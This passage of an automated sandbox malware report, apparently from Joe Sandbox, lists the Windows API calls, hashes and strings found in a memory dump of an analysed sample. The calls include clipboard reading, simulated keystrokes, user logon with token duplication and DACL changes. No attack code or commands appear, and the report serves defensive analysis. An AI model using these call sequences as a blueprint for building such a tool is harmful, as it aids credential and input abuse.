                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoParametersSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3098949447-0
                                                                                                                                                                                                                                      • Opcode ID: ceb17ece135f3584a57390743fa637d9893081ff0d0426714e67cd7fb0b26f74
                                                                                                                                                                                                                                      • Instruction ID: e7720d19190cc0fcd7d239c0b5ce3c732d6988169d1331f9a3de7e3958337b72
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb17ece135f3584a57390743fa637d9893081ff0d0426714e67cd7fb0b26f74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CC09B71280208DFF250D780BC4EF24B7569348715F148402F60D551E383B15454FA10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ECDA5F: FindFirstFileW.KERNEL32(?,?), ref: 00ECDAD6
                                                                                                                                                                                                                                        • Part of subcall function 00ECDA5F: DeleteFileW.KERNEL32(?,?,?,?), ref: 00ECDB26
                                                                                                                                                                                                                                        • Part of subcall function 00ECDA5F: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00ECDB37
                                                                                                                                                                                                                                        • Part of subcall function 00ECDA5F: FindClose.KERNEL32(00000000), ref: 00ECDB4E
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00ED6479
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2191629493-0
                                                                                                                                                                                                                                      • Opcode ID: e1ea52dc60689cef61e9ab5ccb1371130dcba75f5362a2bf59718f6fd2b4efc8
                                                                                                                                                                                                                                      • Instruction ID: ae65d4c62ab9d2d2807503fae1bb623feb10523c557efae25468a269b431b37d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1ea52dc60689cef61e9ab5ccb1371130dcba75f5362a2bf59718f6fd2b4efc8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F08C323142109FCB14EF59E945F6AB7E9EF88764F058419F94AAB352CB70BC02CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EF9E3B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EF9E7C
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EF9EC0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EF9EEA
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EF9F13
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00EF9FAC
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000009), ref: 00EF9FB9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EF9FCF
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 00EF9FD9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFA00A
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFA031
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001030,?,00EF86B6), ref: 00EFA139
                                                                                                                                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EFA14F
                                                                                                                                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EFA162
                                                                                                                                                                                                                                      • SetCapture.USER32(?), ref: 00EFA16B
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00EFA1D0
                                                                                                                                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EFA1DD
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EFA1F7
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 00EFA202
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EFA23A
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EFA247
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFA2A1
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFA2CF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFA30C
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFA33B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EFA35C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EFA36B
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EFA389
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EFA396
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EFA3B4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFA41B
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFA44C
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00EFA4A5
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EFA4D5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFA4FF
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFA522
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00EFA56F
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EFA5A3
                                                                                                                                                                                                                                        • Part of subcall function 00E79B44: GetWindowLongW.USER32(?,000000EB), ref: 00E79B52
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EFA626
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                      • API String ID: 3429851547-4164748364
                                                                                                                                                                                                                                      • Opcode ID: ffb05861ebc42e89a19c011f3e8905c74b5981fba554f4e65e9f5bb17ea5a9fc
                                                                                                                                                                                                                                      • Instruction ID: 49f57e7474a454944c41453376af3a0db3eece00342c5542655c8dcc76f929cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffb05861ebc42e89a19c011f3e8905c74b5981fba554f4e65e9f5bb17ea5a9fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52427C70208208AFD725CF24CC44FBABFE5FF89318F145619F699AB2A1D7319855DB42
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00E7F2CA
                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E7F2E7
                                                                                                                                                                                                                                      • IsIconic.USER32(00000000), ref: 00E7F2F0
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00E7F302
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E7F318
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E7F31F
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E7F32B
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E7F33C
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E7F344
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00E7F34C
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00E7F34F
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7F368
                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00E7F373
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7F37D
                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00E7F382
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7F38B
                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00E7F390
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7F39A
                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00E7F39F
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00E7F3A2
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00E7F3C0
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000000), ref: 00E7F3C8
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 00E7F3D0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                      • API String ID: 1155518417-2988720461
                                                                                                                                                                                                                                      • Opcode ID: 31618ec1e65a9edab0449ba4acaaab583d801b14efce631979774facd5cdcdeb
                                                                                                                                                                                                                                      • Instruction ID: 3f7babddcd21785c35e3578332bd43cbfb24149f3a90d5d141dd7b22948f9b00
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31618ec1e65a9edab0449ba4acaaab583d801b14efce631979774facd5cdcdeb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331A771A40318BFEB202BB65C49FBF7E6DEB84B54F114066FA05FA1D1D6B05D00EA60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC1D4D: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC1D97
                                                                                                                                                                                                                                        • Part of subcall function 00EC1D4D: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC1DC4
                                                                                                                                                                                                                                        • Part of subcall function 00EC1D4D: GetLastError.KERNEL32 ref: 00EC1DD4
                                                                                                                                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00EC1910
                                                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00EC1932
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EC1943
                                                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EC195B
                                                                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 00EC1974
                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00EC197E
                                                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EC199A
                                                                                                                                                                                                                                        • Part of subcall function 00EC1749: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC1886), ref: 00EC175E
                                                                                                                                                                                                                                        • Part of subcall function 00EC1749: CloseHandle.KERNEL32(?,?,00EC1886), ref: 00EC1773
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                                                                      • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                      • Opcode ID: 6c15c350da6c0af741dba3c6dd1c5398079c55333fabb9d521bb686fe95dc548
                                                                                                                                                                                                                                      • Instruction ID: a49e0e4e466d06ae86e2e12bd6d7dc0f663a5840cb02cc9515920c3c6175ac7e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c15c350da6c0af741dba3c6dd1c5398079c55333fabb9d521bb686fe95dc548
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08819871901209AFDF11AFA5CE49FEE7BB9EF46304F045069F905B61A2D732894ACB20
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC179E
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: GetLastError.KERNEL32(?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17AA
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17B9
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17C0
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC17D7
                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC1256
                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC128A
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EC12A1
                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00EC12DB
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC12F7
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EC130E
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00EC1316
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EC131D
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC133E
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00EC1345
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC1374
                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC1396
                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC13A8
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC13CF
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC13D6
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC13DF
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC13E6
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC13EF
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC13F6
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC1402
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC1409
                                                                                                                                                                                                                                        • Part of subcall function 00EC181D: GetProcessHeap.KERNEL32(00000008,00EC123B,?,00000000,?,00EC123B,?), ref: 00EC182B
                                                                                                                                                                                                                                        • Part of subcall function 00EC181D: HeapAlloc.KERNEL32(00000000,?,00000000,?,00EC123B,?), ref: 00EC1832
                                                                                                                                                                                                                                        • Part of subcall function 00EC181D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00EC123B,?), ref: 00EC1841
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                                                                                      • Opcode ID: 201620222b3ebdce6a538a8b3afacb4e7567875d2637fba7e2efb88e822c3455
                                                                                                                                                                                                                                      • Instruction ID: a5c127b88223fe7ce421b22b44c91c2540479642f9d2c92f6dc0e64210f3e0ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 201620222b3ebdce6a538a8b3afacb4e7567875d2637fba7e2efb88e822c3455
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B71CDB2904209AFDF10DFA9DD48FEEBBB9BF45318F044259E914F6191DB329906CB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00EFDCD0), ref: 00EDF382
                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EDF390
                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00EDF39C
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00EDF3A8
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00EDF3E0
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00EDF3EA
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EDF415
                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00EDF422
                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 00EDF42A
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00EDF43B
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 00EDF47B
                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00EDF491
                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000F), ref: 00EDF49D
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00EDF4AE
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00EDF4D0
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EDF4ED
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EDF52B
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00EDF54C
                                                                                                                                                                                                                                      • CountClipboardFormats.USER32 ref: 00EDF56D
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00EDF5B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 420908878-0
                                                                                                                                                                                                                                      • Opcode ID: b95165d1684fc05751983d176ffd7ea99024085b85d2f2dc805f5ab94796d7ce
                                                                                                                                                                                                                                      • Instruction ID: 0c4026522fde6343f85dd681c148f948bdcde05a0e8dade2aa9b8b0116bc7d93
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b95165d1684fc05751983d176ffd7ea99024085b85d2f2dc805f5ab94796d7ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD61AF312042019FD300EF25EC84F7A7BE5EF84318F04556AF856A72A1DB31DD4ACB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ED720E
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ED7262
                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ED729E
                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ED72C5
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ED7302
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ED732F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                                                                                                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                      • API String ID: 3232708057-3289030164
                                                                                                                                                                                                                                      • Opcode ID: 8b65b80f4fa19a052df36e9e4bb9662e20d992bd65931626ddb7dcf1098bdc69
                                                                                                                                                                                                                                      • Instruction ID: ed1f045ba489c7f44ff10847f59eaf16896745553e2376b86e75d89900399b22
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b65b80f4fa19a052df36e9e4bb9662e20d992bd65931626ddb7dcf1098bdc69
